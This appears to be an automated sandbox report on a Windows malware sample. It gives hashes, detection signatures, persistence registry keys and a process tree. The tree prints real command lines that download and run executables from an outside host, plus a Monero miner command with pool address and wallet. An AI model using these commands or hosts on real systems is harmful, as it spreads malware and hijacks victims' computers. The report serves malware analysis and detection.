Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 15:01
Static task
static1
General
-
Target
4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe
-
Size
349KB
-
MD5
136860e019115c0eefd8cf669dd8963e
-
SHA1
fa99887f95f5e0fe48e37c2d464eb56ef1619031
-
SHA256
4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c
-
SHA512
d5fa4175cc0d4a81325f693034e216e6122a4fe551a362f449ad21c5af757fc7f3f75fcaeacf3e7bbe393e2708d371c46ae16f9b8b5762fb9836d8397bf973e3
Malware Config
Signatures
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral1/memory/1008-144-0x0000000000070000-0x00000000004CB000-memory.dmp loaderbot behavioral1/memory/1008-153-0x0000000000070000-0x00000000004CB000-memory.dmp loaderbot behavioral1/memory/1008-150-0x0000000000070000-0x00000000004CB000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 2116 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 816 extd.exe 4080 extd.exe 1160 setup1.exe 3732 extd.exe 2504 setup2.exe 64 extd.exe 1008 setup3.exe 3244 extd.exe 2036 Driver.exe -
resource yara_rule behavioral1/files/0x000600000001ab19-118.dat upx behavioral1/files/0x000600000001ab19-119.dat upx behavioral1/files/0x000600000001ab19-123.dat upx behavioral1/files/0x000600000001ab19-129.dat upx behavioral1/files/0x000600000001ab19-135.dat upx behavioral1/files/0x000600000001ab19-145.dat upx -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2504 setup2.exe 1008 setup3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2204 1160 WerFault.exe 74 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2504 setup2.exe 2504 setup2.exe 1008 setup3.exe 1008 setup3.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe 1008 setup3.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeRestorePrivilege 2204 WerFault.exe Token: SeBackupPrivilege 2204 WerFault.exe Token: SeDebugPrivilege 2204 WerFault.exe Token: SeDebugPrivilege 1008 setup3.exe Token: SeDebugPrivilege 2504 setup2.exe Token: SeLockMemoryPrivilege 2036 Driver.exe Token: SeLockMemoryPrivilege 2036 Driver.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1188 wrote to memory of 3580 1188 4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe 70 PID 1188 wrote to memory of 3580 1188 4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe 70 PID 3580 wrote to memory of 816 3580 cmd.exe 71 PID 3580 wrote to memory of 816 3580 cmd.exe 71 PID 3580 wrote to memory of 816 3580 cmd.exe 71 PID 3580 wrote to memory of 2116 3580 cmd.exe 72 PID 3580 wrote to memory of 2116 3580 cmd.exe 72 PID 3580 wrote to memory of 4080 3580 cmd.exe 73 PID 3580 wrote to memory of 4080 3580 cmd.exe 73 PID 3580 wrote to memory of 4080 3580 cmd.exe 73 PID 3580 wrote to memory of 1160 3580 cmd.exe 74 PID 3580 wrote to memory of 1160 3580 cmd.exe 74 PID 3580 wrote to memory of 1160 3580 cmd.exe 74 PID 3580 wrote to memory of 3732 3580 cmd.exe 75 PID 3580 wrote to memory of 3732 3580 cmd.exe 75 PID 3580 wrote to memory of 3732 3580 cmd.exe 75 PID 3580 wrote to memory of 2504 3580 cmd.exe 78 PID 3580 wrote to memory of 2504 3580 cmd.exe 78 PID 3580 wrote to memory of 2504 3580 cmd.exe 78 PID 3580 wrote to memory of 64 3580 cmd.exe 79 PID 3580 wrote to memory of 64 3580 cmd.exe 79 PID 3580 wrote to memory of 64 3580 cmd.exe 79 PID 3580 wrote to memory of 1008 3580 cmd.exe 80 PID 3580 wrote to memory of 1008 3580 cmd.exe 80 PID 3580 wrote to memory of 1008 3580 cmd.exe 80 PID 3580 wrote to memory of 3244 3580 cmd.exe 81 PID 3580 wrote to memory of 3244 3580 cmd.exe 81 PID 3580 wrote to memory of 3244 3580 cmd.exe 81 PID 1008 wrote to memory of 2036 1008 setup3.exe 83 PID 1008 wrote to memory of 2036 1008 setup3.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe"C:\Users\Admin\AppData\Local\Temp\4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\32A.bat C:\Users\Admin\AppData\Local\Temp\4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14748\123.vbs"3⤵
- Blocklisted process makes network request
PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\14748\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:1160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 4124⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\14748\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:64
-
-
C:\Users\Admin\AppData\Local\Temp\14748\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\319.tmp\329.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3244
-
-